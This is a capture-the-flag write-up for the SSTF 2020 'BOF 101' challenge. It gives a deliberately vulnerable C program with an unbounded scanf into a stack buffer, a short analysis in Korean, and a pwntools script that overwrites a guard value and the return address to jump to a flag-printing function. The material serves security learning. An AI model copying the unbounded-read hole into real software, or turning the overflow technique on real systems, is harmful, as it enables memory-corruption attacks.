[SSTF 2020] BOF 101 Writeup
- Writeup/SSTF 2020
- 2020. 8. 18. 17:50
Analysis
checksec
bof101.c
#include <stdio.h>
//#include <fcntl.h>
//#include <unistd.h>
#include <stdlib.h>
#include <string.h>
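/*
 * Read the first 32 bytes of /flag and print them to stdout.
 *
 * As given, the result of fopen() was used unchecked (fread() on a NULL
 * stream when /flag is absent) and buf was handed to printf("%s") without a
 * terminator, so a flag of 32 or more bytes made "%s" read past the end of
 * buf. Both are handled here; the interface and the normal output are
 * unchanged.
 */
void printflag(void){
    char buf[33];  /* 32 flag bytes plus a NUL terminator */
    FILE* fp = fopen("/flag", "r");
    if (fp == NULL) {
        perror("fopen");
        return;
    }
    /* fread() does not terminate the buffer; n is the byte count actually read */
    size_t n = fread(buf, 1, sizeof buf - 1, fp);
    fclose(fp);
    buf[n] = '\0';
    printf("%s", buf);
    fflush(stdout);
}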
/*
 * Challenge entry point: prints printflag()'s address, reads a name from
 * stdin, and exits early if the `check` guard no longer holds its value.
 *
 * Defects as given: scanf("%s") has no width bound, so input longer than
 * name[] writes past it on the stack (over `check`, the saved frame pointer
 * and the return address). `check` is only a weak guard, since its expected
 * value is visible in the source and the binary. The bounded form would be
 * `scanf("%139s", name)` (139 characters plus NUL), with the return value
 * checked for failure/EOF.
 */
int main() {
/* Guard placed after name[]; its expected value is the literal below. Note
 * 0xdeadbeef does not fit in int, so the store and the later comparison rely
 * on implementation-defined conversion (it works on common ABIs). */
int check=0xdeadbeef;
char name[140];
/* Prints the function's address; %p formally expects a void*, not a function pointer. */
printf("printflag()'s addr: %p\n", &printflag);
printf("What is your name?\n: ");
fflush(stdout);
/* Unbounded read into name[140]: the overflow this page is about. Return value is not checked. */
scanf("%s", name);
if (check != 0xdeadbeef){
printf("[Warning!] BOF detected!\n");
fflush(stdout);
exit(0);
}
return 0;
}
Disassemble
%s로 name에다가 입력을 받으니 BOF가 가능하다.
또한, BOF를 감지하는 변수인 check를 0xdeadbeef로 덮어서 우회해주고 ret를 printflag의 주소로 덮어주면 간단하게 풀릴 것이다.
Exploit
exploit.py
# Solve script for the bof101 challenge above (pwntools). The payload is a
# Python 2 str concatenated with p32()/p64() output.
from pwn import *
p = remote("bof101.sstf.site", 1337)
# The binary prints printflag()'s address before prompting for a name.
p.recvuntil("printflag()'s addr: ")
leak = int(p.recv(14), 16)  # presumably "0x" plus 12 hex digits — verify against the binary's output
payload = str()
payload += 'A' * (0x90 - 0x4)  # bytes from name[] up to check (offset taken from the frame layout)
payload += p32(0xDEADBEEF) # check
payload += 'A' * 8 # sfp
payload += p64(leak) # ret
p.sendlineafter("What is your name?\n", payload)
p.interactive()